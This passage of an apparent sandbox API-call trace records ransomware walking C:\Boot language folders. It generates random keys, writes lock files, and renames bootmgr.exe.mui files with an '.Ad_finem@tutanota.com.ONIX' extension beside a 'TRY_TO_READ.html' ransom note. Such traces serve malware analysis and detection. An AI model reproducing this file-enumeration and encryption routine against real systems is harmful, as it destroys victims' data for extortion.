hHeap=0x410000) returned 1 [0065.467] FindNextFileW (in: hFindFile=0x48e570, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30994ad0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30994ad0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30994ad0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0065.467] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.467] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.467] GetLastError () returned 0x6 [0065.467] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.467] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c60 [0065.467] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.467] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.467] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c60 | out: hHeap=0x410000) returned 1 [0065.467] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.467] FindNextFileW (in: hFindFile=0x48e570, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30994ad0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30994ad0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30994ad0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0065.467] CloseHandle (hObject=0x3cc) returned 1 [0065.467] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.467] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x5, wMilliseconds=0x70)) [0065.467] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0065.467] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0065.467] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0065.468] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Boot\\pt-PT9c354ca09c354b444c.lock") returned 37 [0065.468] CreateFileW (lpFileName="C:\\\\Boot\\pt-PT9c354ca09c354b444c.lock" (normalized: "c:\\boot\\pt-pt9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0065.468] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.468] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.468] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.468] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.468] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47d008 | out: hHeap=0x410000) returned 1 [0065.468] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47d030 | out: hHeap=0x410000) returned 1 [0065.468] FindFirstFileW (in: lpFileName="C:\\\\Boot\\pt-PT\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x30994ad0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30994ad0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48e5b0 [0065.469] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.469] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.469] GetLastError () returned 0x0 [0065.469] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.469] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.469] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.469] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47d008 [0065.469] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x48e5f0 [0065.469] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48e5f0 | out: hHeap=0x410000) returned 1 [0065.469] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.469] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.469] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47d008 | out: hHeap=0x410000) returned 1 [0065.469] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.469] FindNextFileW (in: hFindFile=0x48e5b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x30994ad0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30994ad0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.469] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.469] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.469] GetLastError () returned 0x0 [0065.469] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.469] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.469] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.469] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47d008 [0065.469] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x48e5f0 [0065.469] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48e5f0 | out: hHeap=0x410000) returned 1 [0065.469] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.469] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.469] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47d008 | out: hHeap=0x410000) returned 1 [0065.469] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.469] FindNextFileW (in: hFindFile=0x48e5b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.469] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.469] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.469] GetLastError () returned 0x0 [0065.470] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47d008 [0065.470] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.470] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.470] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.470] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.470] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47d008 | out: hHeap=0x410000) returned 1 [0065.470] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.470] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x48d3b0 [0065.470] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466718 [0065.470] CreateFileW (lpFileName="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.470] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.470] CreateFileW (lpFileName="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.470] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.470] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48d3b0 | out: pbBuffer=0x48d3b0) returned 1 [0065.470] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x466718 | out: pbBuffer=0x466718) returned 1 [0065.470] SetFileAttributesW (lpFileName="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0065.470] lstrlenW (lpString="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui") returned 30 [0065.470] GetProcessHeap () returned 0x410000 [0065.470] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xac) returned 0x473108 [0065.470] lstrcpyW (in: lpString1=0x473108, lpString2="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui") returned="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui" [0065.471] lstrcatW (in: lpString1="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0065.471] GetProcessHeap () returned 0x410000 [0065.471] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473108 | out: hHeap=0x410000) returned 1 [0065.471] CloseHandle (hObject=0xffffffff) returned 0 [0065.471] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.471] FindNextFileW (in: hFindFile=0x48e5b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30994ad0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30994ad0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30994ad0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0065.471] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.471] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.471] GetLastError () returned 0x6 [0065.471] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.471] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c60 [0065.471] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.471] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.471] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c60 | out: hHeap=0x410000) returned 1 [0065.471] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.471] FindNextFileW (in: hFindFile=0x48e5b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30994ad0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30994ad0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30994ad0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0065.471] CloseHandle (hObject=0x3cc) returned 1 [0065.471] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.471] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x5, wMilliseconds=0x70)) [0065.471] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0065.471] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0065.472] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0065.472] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Boot\\ru-RU9c354ca09c354b444c.lock") returned 37 [0065.472] CreateFileW (lpFileName="C:\\\\Boot\\ru-RU9c354ca09c354b444c.lock" (normalized: "c:\\boot\\ru-ru9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0065.472] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.472] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.472] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.472] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.472] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47d058 | out: hHeap=0x410000) returned 1 [0065.472] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47d080 | out: hHeap=0x410000) returned 1 [0065.472] FindFirstFileW (in: lpFileName="C:\\\\Boot\\ru-RU\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x30994ad0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30994ad0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48e5f0 [0065.473] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.473] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.473] GetLastError () returned 0x0 [0065.473] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.473] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.473] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.473] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47d058 [0065.473] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x48e630 [0065.473] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48e630 | out: hHeap=0x410000) returned 1 [0065.473] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.473] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.473] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47d058 | out: hHeap=0x410000) returned 1 [0065.473] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.473] FindNextFileW (in: hFindFile=0x48e5f0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x30994ad0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30994ad0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.473] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.473] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.473] GetLastError () returned 0x0 [0065.473] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.473] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.473] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.473] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47d058 [0065.473] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x48e630 [0065.473] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48e630 | out: hHeap=0x410000) returned 1 [0065.473] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.473] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.473] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47d058 | out: hHeap=0x410000) returned 1 [0065.473] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.473] FindNextFileW (in: hFindFile=0x48e5f0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.473] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.473] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.473] GetLastError () returned 0x0 [0065.473] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47d058 [0065.474] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.474] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.474] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.474] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.474] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47d058 | out: hHeap=0x410000) returned 1 [0065.474] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.474] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x48d4b8 [0065.474] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466728 [0065.474] CreateFileW (lpFileName="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.474] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.474] CreateFileW (lpFileName="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.474] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.474] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48d4b8 | out: pbBuffer=0x48d4b8) returned 1 [0065.474] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x466728 | out: pbBuffer=0x466728) returned 1 [0065.474] SetFileAttributesW (lpFileName="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0065.474] lstrlenW (lpString="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui") returned 30 [0065.474] GetProcessHeap () returned 0x410000 [0065.474] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xac) returned 0x473108 [0065.474] lstrcpyW (in: lpString1=0x473108, lpString2="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui") returned="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui" [0065.474] lstrcatW (in: lpString1="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0065.475] GetProcessHeap () returned 0x410000 [0065.475] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473108 | out: hHeap=0x410000) returned 1 [0065.475] CloseHandle (hObject=0xffffffff) returned 0 [0065.475] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.475] FindNextFileW (in: hFindFile=0x48e5f0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30994ad0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30994ad0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x309bac30, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0065.475] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.475] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.475] GetLastError () returned 0x6 [0065.475] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.475] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c60 [0065.475] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.475] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.475] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c60 | out: hHeap=0x410000) returned 1 [0065.475] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.475] FindNextFileW (in: hFindFile=0x48e5f0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30994ad0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30994ad0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x309bac30, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0065.475] CloseHandle (hObject=0x3cc) returned 1 [0065.475] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.475] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x5, wMilliseconds=0x70)) [0065.475] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0065.475] 